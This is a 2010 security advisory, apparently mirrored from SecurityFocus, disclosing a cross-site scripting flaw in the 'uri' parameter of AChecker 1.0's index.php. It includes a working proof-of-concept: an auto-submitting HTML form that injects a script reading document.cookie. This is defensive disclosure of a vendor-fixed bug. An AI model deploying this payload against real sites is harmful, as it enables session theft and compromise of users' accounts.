XSS vulnerability in AChecker Sep 15 2010 01:10PM
advisory htbridge ch
Vulnerability ID: HTB22601
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_achecker.html
Product: AChecker
Vendor: Inclusive Design Institute ( http://www.atutor.ca/ )
Vulnerable Version: 1.0
Vendor Notification: 01 September 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input in "uri" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value='http://1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="validate_uri" value="Check It" />
<input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
<input type="hidden" name="uploadfile"; filename="" />
<input type="hidden" name="gid[]" value="8" />
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus